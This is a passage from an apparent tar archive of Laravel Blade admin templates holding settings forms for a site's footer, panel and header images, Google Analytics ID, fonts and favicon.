</div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('external-url.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/footer_image/create.blade.php���������������������������������������������������0000644�����������������00000024470�14765366573�0016165 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.footer_image') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('footer-image.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> </h4> @if (isset($footer_image)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('footer-image.update', $footer_image->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 210 x 40) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($footer_image->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/general/'.$footer_image->section_image) }}" alt="logo image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($footer_image->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $footer_image->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#footerImageDestroyModal{{ $footer_image->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $footer_image->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('footer-image.destroy_image', $footer_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="footerImageDestroyModal{{ $footer_image->id }}" tabindex="-1" role="dialog" aria-labelledby="footerImageDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="footerImageDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('footer-image.destroy', $footer_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('footer-image.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 210 x 40) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/panel_image/create.blade.php����������������������������������������������������0000644�����������������00000036047�14765366573�0015771 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.panel_image') }}</h4> @if (isset($panel_image)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('panel-image.update', $panel_image->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.admin_logo') }} ({{ __('content.size') }} 328 x 96) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($panel_image->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/general/'.$panel_image->section_image) }}" alt="logo image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($panel_image->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $panel_image->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.admin_small_logo') }} ({{ __('content.size') }} 112 x 96) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image_2" class="form-control-file" id="section_image_2"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($panel_image->section_image_2)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/general/'.$panel_image->section_image_2) }}" alt="logo image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($panel_image->section_image_2)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal2{{ $panel_image->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#panelImageDestroyModal{{ $panel_image->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $panel_image->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('panel-image.destroy_image', $panel_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="deleteImageModal2{{ $panel_image->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('panel-image.destroy_image_2', $panel_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="panelImageDestroyModal{{ $panel_image->id }}" tabindex="-1" role="dialog" aria-labelledby="panelImageDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="panelImageDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('panel-image.destroy', $panel_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('panel-image.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.admin_logo') }} ({{ __('content.size') }} 328 x 96) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.admin_small_logo') }} ({{ __('content.size') }} 112 x 96) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image_2" class="form-control-file" id="section_image_2"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/google_analytic/create.blade.php������������������������������������������������0000644�����������������00000010624�14765366573�0016661 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.google_analytic') }}</h4> @if (isset($google_analytic)) <form action="{{ route('google-analytic.update', $google_analytic->id) }}" method="POST"> @method('PUT') @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="google_analytic">{{ __('content.google_analytic') }} <span class="text-red">*</span></label> <input type="text" name="google_analytic" class="form-control" id="google_analytic" value="{{ $google_analytic->google_analytic }}" placeholder="G-8FZVTQT8A1" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#googleAnalyticDestroyModal{{ $google_analytic->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="googleAnalyticDestroyModal{{ $google_analytic->id }}" tabindex="-1" role="dialog" aria-labelledby="googleAnalyticDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="googleAnalyticDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('google-analytic.destroy', $google_analytic->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else <form action="{{ route('google-analytic.store') }}" method="POST"> @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="google_analytic">{{ __('content.google_analytic') }} <span class="text-red">*</span></label> <input type="text" name="google_analytic" class="form-control" id="google_analytic" placeholder="G-8FZVTQT8A1" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������views/admin/setting/header_image/create.blade.php���������������������������������������������������0000644�����������������00000037524�14765366573�0016123 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.header_image') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('header-image.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> </h4> @if (isset($header_image)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('header-image.update', $header_image->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 210 x 40) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($header_image->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/general/'.$header_image->section_image) }}" alt="logo image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($header_image->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $header_image->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.image') }} ({{ __('content.size') }} 210 x 40) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image_2" class="form-control-file" id="section_image_2"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($header_image->section_image_2)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/general/'.$header_image->section_image_2) }}" alt="logo image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($header_image->section_image_2)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal2{{ $header_image->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#headerImageDestroyModal{{ $header_image->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $header_image->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('header-image.destroy_image', $header_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="deleteImageModal2{{ $header_image->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModal2CenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModal2CenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('header-image.destroy_image_2', $header_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="headerImageDestroyModal{{ $header_image->id }}" tabindex="-1" role="dialog" aria-labelledby="headerImageDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="headerImageDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('header-image.destroy', $header_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('header-image.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 210 x 40) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.image') }} ({{ __('content.size') }} 210 x 40) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image_2" class="form-control-file" id="section_image_2"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/font/create.blade.php�����������������������������������������������������������0000644�����������������00000024457�14765366573�0014500 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.font') }}</h4> @if (isset($font)) <form action="{{ route('font.update', $font->id) }}" method="POST"> @method('PUT') @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title_font_link">{{ __('content.title_font_link') }}</label> <input type="text" name="title_font_link" class="form-control" id="title_font_link" value="{{ $font->title_font_link }}" placeholder="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap"> <small class="form-text text-muted">{{ __('content.google_font_find_the_font_that_suits_you_and_copy_the_link_here') }} <a href="https://fonts.google.com/" target="_blank">Google Fonts</a></small> <code> <link href="<span class="text-success font-weight-bold">https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap</span>" rel="stylesheet"> </code> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title_font_family">{{ __('content.title_font_family') }} </label> <input type="text" name="title_font_family" class="form-control" id="title_font_family" placeholder="'Poppins', sans-serif" value="{{ $font->title_font_family }}"> <small class="form-text text-muted">{{ __('content.find_the_font_family_and_put_it_here') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="text_font_link">{{ __('content.text_font_link') }}</label> <input type="text" name="text_font_link" class="form-control" id="text_font_link" value="{{ $font->text_font_link }}" placeholder="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap"> <small class="form-text text-muted">{{ __('content.google_font_find_the_font_that_suits_you_and_copy_the_link_here') }} <a href="https://fonts.google.com/" target="_blank">Google Fonts</a></small> <code> <link href="<span class="text-success font-weight-bold">https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap</span>" rel="stylesheet"> </code> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="text_font_family">{{ __('content.text_font_family') }} </label> <input type="text" name="text_font_family" class="form-control" id="text_font_family" placeholder="'Roboto', sans-serif" value="{{ $font->text_font_family }}"> <small class="form-text text-muted">{{ __('content.find_the_font_family_and_put_it_here') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#fontDestroyModal{{ $font->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="fontDestroyModal{{ $font->id }}" tabindex="-1" role="dialog" aria-labelledby="fontDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="fontDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('font.destroy', $font->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else <form action="{{ route('font.store') }}" method="POST"> @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title_font_link">{{ __('content.title_font_link') }}</label> <input type="text" name="title_font_link" class="form-control" id="title_font_link" placeholder="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap"> <small class="form-text text-muted">{{ __('content.google_font_find_the_font_that_suits_you_and_copy_the_link_here') }} <a href="https://fonts.google.com/" target="_blank">Google Fonts</a></small> <code> <link href="<span class="text-success font-weight-bold">https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap</span>" rel="stylesheet"> </code> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title_font_family">{{ __('content.title_font_family') }} </label> <input type="text" name="title_font_family" class="form-control" id="title_font_family" placeholder="'Poppins', sans-serif"> <small class="form-text text-muted">{{ __('content.find_the_font_family_and_put_it_here') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="text_font_link">{{ __('content.text_font_link') }}</label> <input type="text" name="text_font_link" class="form-control" id="text_font_link" placeholder="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap"> <small class="form-text text-muted">{{ __('content.google_font_find_the_font_that_suits_you_and_copy_the_link_here') }} <a href="https://fonts.google.com/" target="_blank">Google Fonts</a></small> <code> <link href="<span class="text-success font-weight-bold">https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap</span>" rel="stylesheet"> </code> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="text_font_family">{{ __('content.text_font_family') }} </label> <input type="text" name="text_font_family" class="form-control" id="text_font_family" placeholder="'Roboto', sans-serif"> <small class="form-text text-muted">{{ __('content.find_the_font_family_and_put_it_here') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/favicon/create.blade.php��������������������������������������������������������0000644�����������������00000022764�14765366573�0015156 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.favicon') }}</h4> @if (isset($favicon)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('favicon.update', $favicon->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="favicon_image">{{ __('content.favicon') }} ({{ __('content.size') }} 128 x 128) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="favicon_image" class="form-control-file" id="favicon_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> 